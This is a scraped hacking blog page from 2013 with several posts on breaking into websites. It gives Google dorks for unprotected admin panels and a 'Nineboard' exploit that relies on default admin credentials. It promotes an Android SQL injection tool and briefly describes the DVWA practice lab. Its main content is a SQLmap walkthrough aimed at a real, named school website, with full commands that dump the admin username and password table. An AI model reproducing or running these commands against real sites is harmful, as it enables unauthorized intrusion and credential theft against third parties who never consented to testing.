Google Dorks To Find Unsecure Web Admin Panels
Search from google dorks and open any site
u will not need username and password to access admin panels
Showing posts with label Website Hacking. Show all posts
Showing posts with label Website Hacking. Show all posts
Saturday 17 August 2013
Thursday 8 August 2013
How to hack a website using Android phone - Droidsqli
How to hack a website using Android phone - Droidsqli
Hello Guys today we talk about how to hacked a website using your Android phone.We know that in the world 70% website hacked by using SQL injection.
For automate SQL injection We need tool or OS - back track, havij or Kali, and etc..But now you can attack on site using your android mobile phone and Tables and hack website.
Only you need 3 things
1 - SQL Vulnerable site
2 - android mobile
3 - Droidsqli tool
DroidSQLi is the first automated MySQL Injection tool for Android. It allows you to test your MySQL-based web application against SQL injection attacks.
DroidSQLi supports the following injection techniques:
It automatically selects the best technique to use and employs some simple filter evasion methods
Wednesday 7 August 2013
Nineboard Admin Panel Exploit
Nineboard Admin Panel Exploit
Nineboard Admin Panel Exploit
You can get admin panel by using this vulnerability =)
Dork : NINEBOARD Vol 3.0 Copyright © and "intitle:NINEBOARD 3.0"
You can get admin panel by using this vulnerability =)
Dork : NINEBOARD Vol 3.0 Copyright © and "intitle:NINEBOARD 3.0"
(its Not a particular dork, use your mind to find vulnerable website)
Exploit : Goto site.com/login.php or site.com/path/login.php
Now Admin = Admin
Password = admin
and you're in :D
enjoy !!
Hack website with DVNA ultimate tutorial
Web Hacking with DVNA
(DVNA) Damn Vulnerable Web Application is a collection of website hacking tool based on PHP / mySQL. DVWA may be an option for beginners to learn web hacking web hacking techniques from scratch. Various techniques web hacking attacks can be obtained from this tool. Besides easy to use, lightweight and complete, DVWA run through a local server (localhost) using WAMP / XAMP / LAMP and others.--------------------------------------------------------------------------------------------------------------------------------DVWA include some web hacking tools such as :
- SQL Injection
- XSS (Cross Site Scripting)
- LFI (Local File Inclusion)
- RFI (Remote File Inclusion)
- Command Execution
- Upload Script
- Login Brute ForceDownload here
(DVNA) Damn Vulnerable Web Application is a collection of website hacking tool based on PHP / mySQL. DVWA may be an option for beginners to learn web hacking web hacking techniques from scratch. Various techniques web hacking attacks can be obtained from this tool. Besides easy to use, lightweight and complete, DVWA run through a local server (localhost) using WAMP / XAMP / LAMP and others.--------------------------------------------------------------------------------------------------------------------------------DVWA include some web hacking tools such as :
- SQL Injection
- XSS (Cross Site Scripting)
- LFI (Local File Inclusion)
- RFI (Remote File Inclusion)
- Command Execution
- Upload Script
- Login Brute ForceDownload here
SQLmap Step by Step Tutorial
SQLmap Step by Step Tutorial
Today we will learn how to operate the "best SQL injection exploiting tool" i.e SQLMAP
Today we will learn how to operate the "best SQL injection exploiting tool" i.e SQLMAP
its a python tool , and it is preloaded in almost every Back Track version
first of all
we need a vulnerable target!
here it is
http://www.alliedschools.edu.pk/main_news.php?news_id=52
ok first step is to fatch the databases
command will be like this one
python ./sqlmap.py -u http://www.alliedschools.edu.pk/main_news.php?news_id=52 --dbs
here:-
-u is stand for which is vulnerable to SQL injection
and --dbs is used for fatching total databases in website :D
ok after completing the process of fataching the databases it will something like that available databases(8) [*]informtion_schema [*]alliedschools_web
now we are going to expoit database alliedschools_web and fatch the tables present in it XD
ok command will change a little bit :-
python ./sqlmap.py -u http://www.alliedschools.edu.pk/main_news.php?news_id=52 -D alliedschools_web --tables
here :-
-D and then name of the database from which we want to fatch tables and
--tables is for fatching total table present in the database
after processing we will get the tables present in database "alliedschools_web"
after processing we will get something like that Database: alliedschools_campus [18 Tables ] admin campus ...... ......
now we are going to fatch the cloumns from table admin of database alliedschools_campus
command is :-
python ./sqlmap.py -u http://www.alliedschools.edu.pk/main_news.php?news_id=52 -D alliedschools_campus -T admin --columns
now we will get something like this Database: alliedschools_campus Table : admin [12 columns ] admin_password admin_username admin_email ...... ......
This is the last command to get the admin username and password command is python ./sqlmap.py -u http://www.alliedschools.edu.pk/main_news.php?news_id=52 -D alliedschools_campus -T admin -C admin_password, admin_username --dump
and after finishing process we will get something like that Database: alliedschools_campus Table : admin [6 entries] admin_password admin_username $erver admin ...... ......Now You Have admin Password of website, Find admin panel and ...xDCeridts To : Zero & Team indishell :D
Subscribe to:
Posts (Atom)
